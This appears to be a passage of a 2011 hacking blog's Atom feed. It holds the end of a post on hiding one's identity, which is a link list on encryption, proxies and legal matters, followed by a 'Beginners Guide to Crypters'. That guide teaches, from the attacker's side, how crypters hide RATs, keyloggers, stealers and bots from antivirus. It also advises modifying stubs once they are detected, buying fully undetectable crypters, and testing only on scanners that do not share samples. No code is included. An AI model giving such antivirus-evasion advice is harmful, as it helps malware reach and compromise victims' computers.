class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Bibliography:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;UK law report:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://arstechnica.com/tech-policy/news/...l-time.ars&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;http://arstechnica.com/tech-policy/news/...l-time.ars&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Regulation of Investigatory Powers Act:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://www.opsi.gov.uk/acts/acts2000/ukpga_20023_en_8&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;http://www.opsi.gov.uk/acts/acts2000/ukpga_20023_en_8&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Goverment stance on AES:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://csrc.nist.gov/groups/STM/cmvp/doc...SS15FS.pdf&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;http://csrc.nist.gov/groups/STM/cmvp/doc...SS15FS.pdf&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Wikipedia review on AES:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Advanced_En...d#Security&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;http://en.wikipedia.org/wiki/Advanced_En...d#Security&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;TrueCrypt Hidden o/s:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wv3X&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Link&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;SOCKS Information and example:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/SOCKS&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;http://en.wikipedia.org/wiki/SOCKS&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Proxy Chaining:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wv3w&quot;&gt;Link&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Linux infection news:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://www.zdnet.com/blog/bott/linux-inf...dated/2206&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;http://www.zdnet.com/blog/bott/linux-inf...dated/2206&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Official IRCd announcement:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://forums.unrealircd.com/viewtopic.php?t=6562&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;http://forums.unrealircd.com/viewtopic.php?t=6562&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;Credits: &lt;a href=&quot;http://adf.ly/1Wv4w&quot;&gt;crackhackforum&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/3020940383138485550/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hide-like-hacker.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/3020940383138485550'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/3020940383138485550'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hide-like-hacker.html' title='Hide Like a Hacker'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-6608064664779560483</id><published>2011-05-10T12:54:00.001+05:30</published><updated>2011-05-10T12:54:34.864+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Botnet"/><category scheme="http://www.blogger.com/atom/ns#" term="Crypter"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><title type='text'>Beginners Guide to Crypters</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&amp;nbsp;* What is a crypter?&lt;br /&gt;
&amp;nbsp;* What constitute a crypter?&lt;br /&gt;
&amp;nbsp;* Are all crypters same?Confused&lt;br /&gt;
&amp;nbsp;* How many types of crypters are there?&lt;br /&gt;
&amp;nbsp;* FUD/UD, What the hell is that?&lt;br /&gt;
&amp;nbsp;* Stub?Omg What is it use?&lt;br /&gt;
&amp;nbsp;* Will my Crypter remain FUD forever?&lt;br /&gt;
&amp;nbsp;* How to make sure my crypter remain FUD for the longest time?&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Crypters&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;Oh well, the shiny little toys every members on HF wants to play with, you register to HF and see countless threads on &quot;Selling crypters cheap&quot; or &quot;Please crypt my file I will pay or +rep&quot;(ah.. the good ol&#39; days)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;A Crypter is free software used to hide our viruses, RATs or any keylogger from anti-viruses so that they are not detected and deleted by anti-viruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Crypters may be coded in different launguages but there functionality remain almost the same i.e to crypt your detectable servers so they become FUD.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;FUD&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;FUD means Fully Undetectable and UD means Undetectable.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;A FUD crypter is theoretically/practically not detected by any AV at the time of it being scanned on Virus Scanners.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;With increased use of Crypters to bypass anti-viruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide Rats(PI, Bifrost), Stealers and Bots became more complicated as nowadays, no publicly available crypter is FUD.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;So, if you crypt RAT, Bot servers with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain &quot;FUD&quot; for maximum of one or two days after their public release.Then they become UD.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;So, if you want a FUD or close to FUD crypter, I suggest Buying one or learn to make public crypters FUD or Semi-FUD(The crypter which is detected by 2-3 AV&#39;s).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Parts of a Crypter&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;A Crypter has 2 parts:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;* Client&lt;br /&gt;
&amp;nbsp;* Stub&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;A) The client is the interface where we may upload our file and use the options it brings, according to the programmer that made the crypter and crypt our files.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;B) The stub is an executable file(.exe) or a. Dll some times. This file is used as a filter for files that are uploaded to the client crypter.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Functioning &lt;/b&gt;:&lt;br /&gt;
&amp;nbsp;Once the client is open, it loads its stub ... goes through the file, and accordingly the file gets crypted as the stub.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Here is how executable crypters work:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;1) The actual processor commands of a protected binary are crypted/obscured/munged whatever&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;2) When the protected application first starts, a small decrypter stub is first run that restores all of the original processor commands for the executable in memory.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;3) Finally, the decrypter stub ends and transfers execution to the original entry point (OEP) and the program runs normally. So, basically the crypter&#39;s that have in-built stubs gets detected very fast, the others take some time to get detected.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Also you can modify the stub once it gets detected by changing the entry and exit points.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;&amp;nbsp;Types of Crypter&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;* External Stub&lt;br /&gt;
&amp;nbsp;* Internal Stub&lt;br /&gt;
&amp;nbsp;* Runtime&lt;br /&gt;
&amp;nbsp;* Scantime &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;External Stub&lt;/b&gt; : Well most of you have downloaded a public crypter by now and when you open the folder you have seen 2 things:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Client.exe and Stub.exe&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;These type of crypters are called External Crypter in which the functionality of the crypter pretty much depends on the external stub.&lt;br /&gt;
&amp;nbsp;You delete the stub and the crypter is useless.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;Internal Stub&lt;/b&gt; : The crypters that contain only Client.exe fall under this category. In this the stub is coded within the crypter.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;There are ways to detach the stub from the crypter, but in some other tutorial.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;Runtime Crypters&lt;/b&gt; : The crypters that crypts a server that remains Undetectable upon running in the memory of a PC is called a runtime crypter.&lt;br /&gt;
&amp;nbsp;This is the one you want for all your servers and executables.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Scantime Crypter&lt;/b&gt; : The crypters that crypts a server that remains Undetectable upon scanning by AV&#39;s but when run in the PC gets detected by the AV.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;How long my Crypter will be FUD?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Well If you have read this far chances are you still are/or will be using public crypters for a while. So chances are that your crypter will go Semi-FUD within 1-3 weeks. Depends on the crypter and your own good will.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;If you want that your FUD public/private crypters to remain FUD use only novirusthanks.org with option enabled DO NOT Re-Distribute data.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/6608064664779560483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/beginners-guide-to-crypters.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/6608064664779560483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/6608064664779560483'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/beginners-guide-to-crypters.html' title='Beginners Guide to Crypters'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry></feed>